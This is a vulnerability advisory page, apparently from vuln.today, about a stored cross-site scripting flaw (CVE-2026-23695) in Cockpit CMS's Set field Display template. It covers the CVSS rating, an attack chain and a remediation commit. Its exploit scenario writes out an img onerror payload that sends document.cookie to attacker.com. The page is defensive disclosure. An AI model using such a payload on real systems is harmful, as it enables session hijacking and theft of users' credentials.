Skip to main content

Cockpit CMS CVE-2026-23695

| EUVD-2026-30556 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-15 VulnCheck GHSA-ch4j-vcf5-58x5
XSS Cockpit
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

3
Source Code Evidence Fetched
May 15, 2026 - 17:33 vuln.today
Analysis Generated
May 15, 2026 - 17:33 vuln.today
CVSS changed
May 15, 2026 - 17:22 NVD
5.4 (MEDIUM) 5.1 (MEDIUM)

DescriptionCVE.org

Cockpit CMS through version 2.14.0, patched in commit 72a83fc, contains a stored cross-site scripting vulnerability in the Set field type's Display template option, where the template string is processed by the $interpolate function using new Function() and rendered via Vue's v-html directive without sanitization. An attacker with content/:models/manage permission can inject arbitrary JavaScript into the Display template, which executes in the browser of any user viewing the collection items list.

AnalysisAI

Stored cross-site scripting in Cockpit CMS 2.14.0 and earlier allows authenticated users with content/:models/manage permission to inject arbitrary JavaScript through the Set field type's Display template option. The vulnerability exploits unsafe template rendering via new Function() and Vue's v-html directive without sanitization, executing injected code in the browsers of all users viewing the collection items list. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate with content editor privileges
Delivery
Access collection field settings
Exploit
Inject malicious JavaScript in Set field Display template
Install
Save configuration
C2
Victim user views collection items list
Execute
Browser executes stored XSS payload
Impact
Exfiltrate session tokens or perform actions as victim
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Requires authenticated access with content/:models/manage permission, which is typically granted to content editors and administrators in Cockpit CMS but not to anonymous or read-only users. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Moderate real-world risk despite low CVSS 5.1 score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A content editor with content/:models/manage permission logs into Cockpit CMS and navigates to a collection's field configuration. They edit a Set field type's Display template option and inject malicious JavaScript such as <img src=x onerror='fetch("https://attacker.com?c="+document.cookie)'> wrapped in template syntax that bypasses basic validation. …
Remediation Upgrade to Cockpit CMS post-2.14.0 versions incorporating commit 72a83fc or later from the main branch at https://github.com/Cockpit-HQ/Cockpit/commit/72a83fcfe85ad8330e9ae834bc02fa517b5749e9. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-23695 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy